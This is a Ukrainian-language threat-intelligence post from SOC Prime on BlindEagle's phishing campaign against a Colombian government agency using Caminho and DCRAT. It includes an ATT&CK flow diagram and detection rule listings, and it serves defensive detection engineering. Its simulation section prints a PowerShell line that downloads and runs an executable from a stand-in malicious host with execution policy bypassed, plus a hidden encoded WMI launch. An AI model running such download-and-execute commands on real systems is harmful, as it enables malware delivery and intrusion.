SOC Prime Bias: Критичний

17 Dec 2025 17:04
newspaper icon BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar Read post

BlindEagle націлюється на державну агенцію Колумбії за допомогою Caminho та DCRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
BlindEagle націлюється на державну агенцію Колумбії за допомогою Caminho та DCRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Короткий огляд

BlindEagle провела операцію зі спір-фішингу, спрямовану на державну агенцію Колумбії, поширивши зброєний SVG-вкладення, що ініціювало ланцюг виконання JavaScript до PowerShell. Цей ланцюг завантажив загрузник, названий Caminho, який потім отримав троян віддаленого доступу з відкритим кодом DCRAT, розміщений на Discord. Завершальна стадія використовувала процесинг hollowing у MSBuild.exe і застосовувала кілька методів ухилення для зменшення виявлення.

Розслідування

Zscaler ThreatLabz проаналізувала ланцюг зараження і повідомила про методику сховання SVG, кілька рівнів обфускації JavaScript, команду PowerShell, викликану через WMI, і доставку Caminho через URL, розміщений на Discord. Розслідування також пов’язало підтримуючу інфраструктуру зі шведськими IP-адресами та динамічним DNS-провайдером (ydns.eu).

Узагальнення

Запровадьте суворіші дії для вхідних вкладень електронної пошти — особливо для SVG-вмісту — і забезпечте знешкодження/перевірку вмісту для вбудованих скриптів. Використовуйте політики веб-проксі для обмеження доступу до підозрілих кінцевих точок з розміщення файлів, включаючи URL-адреси Discord, які використовуються для доставки шкідливого програмного забезпечення. Моніторте незвичайні шаблони виконання PowerShell та WMI і впроваджуйте політики списків дозволених додатків, що охоплюють використання MSBuild.exe.

Відповідь

Відповідь

Активуйте сигналізації для шкідливого артефакту SVG, згаданого імені JavaScript-файлу та завантажень, що досягають URL-адреси Discord. Проводьте пошуки залишків Caminho та DCRAT у пам’яті або на диску, свідчень процесингу hollowing MSBuild.exe та стійкості через зміни реєстру або заплановані завдання. Карантинизуйте уражені кінцеві точки та блокуйте визначений домен C2.

“graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 %% Nodes initial_access_phishing[“<b>Дія</b> – <b>T1566.001 Фішинг Вкладення</b><br />Вкладення SVG у електронній пошті”] class initial_access_phishing action user_exec_malicious_link[“<b>Дія</b> – <b>T1204.001 Виконання користувача</b><br />Клік по шкідливому зображенню SVG”] class user_exec_malicious_link action user_exec_malicious_file[“<b>Дія</b> – <b>T1204.002 Виконання користувача</b><br />Відкриття файлу JavaScript”] class user_exec_malicious_file action obfuscation_svg_smuggling[“<b>Техніка</b> – <b>T1027.017</b><br />Заховання скрипту через SVG”] class obfuscation_svg_smuggling technique obfuscation_embedded_payloads[“<b>Техніка</b> – <b>T1027.009</b><br />JavaScript навантаження у форматі Base64”] class obfuscation_embedded_payloads technique command_js[“<b>Техніка</b> – <b>T1059.007 JavaScript</b><br />Скрипти дезобфускації”] class command_js technique command_powershell[“<b>Техніка</b> – <b>T1059.001 PowerShell</b><br />Створення WMI для запуску PowerShell”] class command_powershell technique event_wmi_subscription[“<b>Техніка</b> – <b>T1546.003</b><br />Виконання підписки на подію WMI”] class event_wmi_subscription technique obfuscation_steganography[“<b>Техніка</b> – <b>T1027.003</b><br />Приховування навантаження у PNG зображенні”] class obfuscation_steganography technique reflective_code_loading[“<b>Техніка</b> – <b>T1620</b><br />Завантаження відбивальної збірки .NET”] class reflective_code_loading technique process_hollowing[“<b>Техніка</b> – <b>T1055.012</b><br />Порожнинна ін’єкція MsBuild”] class process_hollowing technique downloader_caminho[“<b>Інструмент</b> – <b>Ім’я</b>: Завантажувач Caminho<br /><b>Призначення</b>: Отримання DCRAT”] class downloader_caminho tool malware_dcrat[“<b>Шкідливе ПЗ</b> – <b>Ім’я</b>: DCRAT”] class malware_dcrat malware amsi_bypass[“<b>Техніка</b> – <b>T1027.005</b><br />Обхід AMSI шляхом патчування”] class amsi_bypass technique persistence_run_key[“<b>Техніка</b> – <b>T1547.001</b><br />Створення ключа запуску в реєстрі”] class persistence_run_key technique persistence_scheduled_task[“<b>Техніка</b> – <b>T1053</b><br />Створення запланованої задачі”] class persistence_scheduled_task technique c2_discord[“<b>Командування та контроль</b> – URL Discord, використовуваний для розподілу навантаження”] class c2_discord technique %% Connections initial_access_phishing u002du002d>|leads_to| user_exec_malicious_link user_exec_malicious_link u002du002d>|leads_to| user_exec_malicious_file user_exec_malicious_file u002du002d>|leads_to| obfuscation_svg_smuggling obfuscation_svg_smuggling u002du002d>|leads_to| obfuscation_embedded_payloads obfuscation_embedded_payloads u002du002d>|leads_to| command_js command_js u002du002d>|leads_to| command_powershell command_powershell u002du002d>|leads_to| event_wmi_subscription event_wmi_subscription u002du002d>|leads_to| obfuscation_steganography obfuscation_steganography u002du002d>|leads_to| reflective_code_loading reflective_code_loading u002du002d>|leads_to| process_hollowing process_hollowing u002du002d>|leads_to| downloader_caminho downloader_caminho u002du002d>|downloads| malware_dcrat malware_dcrat u002du002d>|performs| amsi_bypass malware_dcrat u002du002d>|establishes| persistence_run_key malware_dcrat u002du002d>|establishes| persistence_scheduled_task malware_dcrat u002du002d>|uses| c2_discord “

Потік атаки

Детекції

Підозрілі рядки PowerShell (через powershell)

Команда SOC Prime
17 грудня 2025

Перегляд

LOLBAS WScript / CScript (через процес створення)

Команда SOC Prime
17 грудня 2025

Перегляд

Можливо, Інтернет Архіву, вирішено за незвичним процесом (через dns_query)

Команда SOC Prime
17 грудня 2025

Перегляд

Виклик підозрілих методів .NET із PowerShell (через powershell)

Команда SOC Prime
17 грудня 2025

Перегляд

IOC (HashMd5) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Перегляд

IOC (SourceIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Перегляд

IOC (HashSha1) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Перегляд

IOC (HashSha256) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Перегляд

IOC (DestinationIP) для детекції: BlindEagle націлює державну агенцію Колумбії з використанням Caminho і DCRAT

Правила SOC Prime AI
17 грудня 2025

Перегляд

Детекція команди PowerShell BlindEagle, що використовує WMI [Windows Powershell]

Правила SOC Prime AI
17 грудня 2025

Перегляд

Виконання симуляції

Передумова: Перевірка телеметрії та базового рівня повинна бути успішною.

Пояснення: Цей розділ деталізує точне виконання техніки противника (TTP), спроектованої для активації правила детекції. Команди та наратив повинні прямо відображати заплановані TTP і намагатися генерацію точної телеметрії, яку очікує логіка детекції.

  • Атака Narrative & Команди:
    Атакуючий (BlindEagle) використовує WMI для запуску процесу PowerShell, що завантажує навантаження “Caminho” з віддаленого серверу C2 та виконує його в пам’яті. Використовуючи wmic.exe з методом процес call create , зловмисник може запустити PowerShell без взаємодії з користувацькою сесією, що робить активність прихованою. У командному рядку міститься дослівне слово “powershell”, яке відповідає умовам правила детекції.

    1. Етап 1 – Підготувати шкідливий PowerShell one-liner:

      $url = "http://malicious.example.com/caminho.exe"
$out = "$env:TEMPcaminho.exe"
Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out

    2. Етап 2 – Виконати через WMI:

      $psCmd = 'powershell -nop -w hidden -enc '
wmic process call create "$psCmd"

    Наявність powershell в полі CommandLine події Sysmon Event 1, згенерована дочірнім процесом wmic , активує правило.

  • Скрипт регресійного тесту:

    # Симуляція PowerShell через WMI на прикладі BlindEagle
# ----------------------------------------------------------------------
# 1. Визначте шкідливе навантаження (для тесту ми використовуємо безпечну echo-команду)
$payload = 'Write-Host "Simulated Caminho execution"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# 2. Створіть командний рядок PowerShell, який включає дослівне слово "powershell"
$psCommand = "powershell -NoProfile -EncodedCommand $encoded"

# 3. Запустіть команду через WMI (wmic) для генерації події Sysmon EventID 1
$wmicCommand = "wmic process call create `"$psCommand`""
Write-Host "Виконання через WMI: $wmicCommand"
Invoke-Expression $wmicCommand

# 4. Додатково: Запишіть у консоль для підтвердження
Write-Host "Симуляція завершена. Перевірте детекцію в SIEM."

  • Команди прибирання:

    # Видаліть будь-які тимчасові файли (жоден не створено у цій симуляції)
# Припиніть будь-які довготривалі процеси wmic або PowerShell, які використовувалися для тесту
Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "Прибирання завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам почати і забезпечити негайну користь, заплануйте зустріч з експертами SOC Prime.

Приєднатися безкоштовно